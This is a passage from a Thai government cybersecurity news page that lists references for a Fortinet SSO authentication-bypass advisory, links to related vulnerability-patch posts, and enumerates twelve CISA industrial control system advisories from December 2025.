แหล่งอ้างอิง (References)
1.Fortinet PSIRT Advisory – FG-IR-25-647
https://fortiguard.fortinet.com/psirt/FG-IR-25-647
2.Australian Cyber Security Centre (ACSC)
Critical Vulnerabilities in Multiple Fortinet Products – FortiCloud SSO Login Authentication Bypass
https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/critical-vulnerabilities-in-multiple-fortinet-products-forticloud-sso-login-authentication-bypass
3.NVD – CVE-2025-59718
https://nvd.nist.gov/vuln/detail/CVE-2025-59718
4.NVD – CVE-2025-59719
https://nvd.nist.gov/vuln/detail/CVE-2025-59719
5.Arctic Wolf – Technical Analysis
https://arcticwolf.com/resources/blog/cve-2025-59718-and-cve-2025-59719/#CyberSecurity #Fortinet #CyberSecurity #Vulnerability #ThaiCERT #ข่าวไซเบอร์ #เตือนภัยไซเบอร์
-
Google ออกแพตช์อุดช่องโหว่ Zero-day บน Chrome ถูกใช้โจมตีแล้ว รีบอัปเดตทันทีโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
Microsoft แก้ไขช่องโหว่ Zero-day ที่กำลังถูกใช้โจมตีในแพตช์ความปลอดภัยประจำเดือนธันวาคม 2025โพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
วิกฤตช่องโหว่ React2Shell ระบาดหนัก ถูกใช้โจมตีแล้วกว่า 50 องค์กรทั่วโลก รีบอัปเดตแพตช์ด่วนก่อนสายโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
CISA เผยแพร่คำแนะนำด้านระบบควบคุมอุตสาหกรรม (ICS) จำนวน 5 รายการโพสต์ใน OT Cyber Security News
Cybersecurity and Infrastructure Security Agency (CISA) ได้เผยแพร่คำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม (ICS) จำนวน 12 รายการ เมื่อวันที่ 2 ธันวาคม 2025 เพื่อให้ข้อมูลที่ทันเวลาเกี่ยวกับประเด็นด้านความมั่นคงปลอดภัย ช่องโหว่ และการโจมตีที่เกี่ยวข้องกับระบบ ICS โดยมีรายละเอียดดังนี้
- ICSA-25-345-01 Johnson Controls iSTAR
- ICSA-25-345-02 Johnson Controls iSTAR Ultra
- ICSA-25-345-03 AzeoTech DAQFactory
- ICSA-25-345-04 Siemens IAM Client
- ICSA-25-345-05 Siemens Advanced Licensing (SALT) Toolkit
- ICSA-25-345-06 Siemens SINEMA Remote Connect Server
- ICSA-25-345-07 Siemens Building X - Security Manager Edge Controller
- ICSA-25-345-08 Siemens Energy Services
- ICSA-25-345-09 Siemens Gridscale X Prepay
- ICSA-25-345-10 OpenPLC_V3
- ICSMA-25-345-01 Grassroots DICOM (GDCM)
- ICSMA-25-345-02 Varex Imaging Panoramic Dental Imaging Software
CISA แนะนำให้ผู้ใช้งานและผู้ดูแลระบบ ตรวจสอบคำแนะนำ ICS ที่เผยแพร่ล่าสุด เพื่อศึกษารายละเอียดทางเทคนิคและแนวทางการลดความเสี่ยง (mitigations)
อ้างอิง
https://www.cisa.gov/news-events/alerts/2025/12/11/cisa-releases-12-industrial-control-systems-advisories
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand